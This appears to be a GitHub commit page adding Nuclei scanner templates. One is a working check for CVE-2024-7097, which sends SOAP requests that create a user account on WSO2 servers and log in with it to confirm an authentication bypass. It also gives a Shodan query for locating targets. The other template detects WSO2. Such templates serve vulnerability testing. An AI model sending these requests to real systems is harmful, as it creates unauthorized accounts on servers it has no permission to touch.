-
-
Notifications
You must be signed in to change notification settings - Fork 194
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Auto Update Nuclei [Sat Jan 18 06:25:06 UTC 2025] :robot:
- Loading branch information
1 parent
b7d75e3
commit f4b3ce7
Showing
4 changed files
with
97 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,75 @@ | ||
| id: CVE-2024-7097 | ||
|
|
||
| info: | ||
| name: WSO2 User Registration - Arbitrary Account Creation | ||
| author: iamnoooob,rootxharsh,pdresearch | ||
| severity: medium | ||
| description: | | ||
| The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings. | ||
| reference: | ||
| - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/ | ||
| - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/ | ||
| metadata: | ||
| verified: true | ||
| max-request: 2 | ||
| shodan-query: "WSO2 Carbon Server" | ||
| tags: cve,cve2024,wso2,intrusive,auth-bypass | ||
|
|
||
| variables: | ||
| username: "{{randstr_1}}" | ||
| password: "{{randstr_2}}" | ||
|
|
||
| flow: http(1) && http(2) | ||
|
|
||
| http: | ||
| - raw: | ||
| - | | ||
| POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| SOAPAction: "urn:addUser" | ||
| Content-Type: text/xml | ||
| <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" | ||
| xmlns:xsd="http://org.apache.axis2/xsd"> | ||
| <soapenv:Header/> | ||
| <soapenv:Body> | ||
| <xsd:addUser> | ||
| <xsd:user> | ||
| <xsd:userName>{{username}}</xsd:userName> | ||
| <xsd:password>{{password}}</xsd:password> | ||
| </xsd:user> | ||
| </xsd:addUser> | ||
| </soapenv:Body> | ||
| </soapenv:Envelope> | ||
| matchers: | ||
| - type: status | ||
| status: | ||
| - 202 | ||
| internal: true | ||
|
|
||
| - raw: | ||
| - | | ||
| POST /services/AuthenticationAdmin HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| SOAPAction: "" | ||
| Content-Type: text/xml | ||
| <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" | ||
| xmlns:aut="http://authentication.services.core.carbon.wso2.org"> | ||
| <soapenv:Header/> | ||
| <soapenv:Body> | ||
| <aut:login> | ||
| <aut:username>{{username}}</aut:username> | ||
| <aut:password>{{password}}</aut:password> | ||
| </aut:login> | ||
| </soapenv:Body> | ||
| </soapenv:Envelope> | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - "loginResponse" | ||
| - "<ns:return>true</ns:return>" | ||
| condition: and | ||
| # digest: 4a0a00473045022100a329adb144a01bd414cbf48754c7aec71dbb4db306c5a4f4a544616bab1f414402201aae5ae006320958b435bd6f02e62eb5bc3ecc3881411b2c6a9817fd0d5ed10a:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| id: wso2 | ||
| info: | ||
| name: wso2 | ||
| author: cn-kali-team | ||
| tags: detect,tech,wso2 | ||
| severity: info | ||
| metadata: | ||
| product: wso2 | ||
| shodan-query: | ||
| - wso2 carbon server | ||
| vendor: wso2 | ||
| verified: true | ||
| http: | ||
| - method: GET | ||
| path: | ||
| - '{{BaseURL}}/' | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - wso2 carbon server |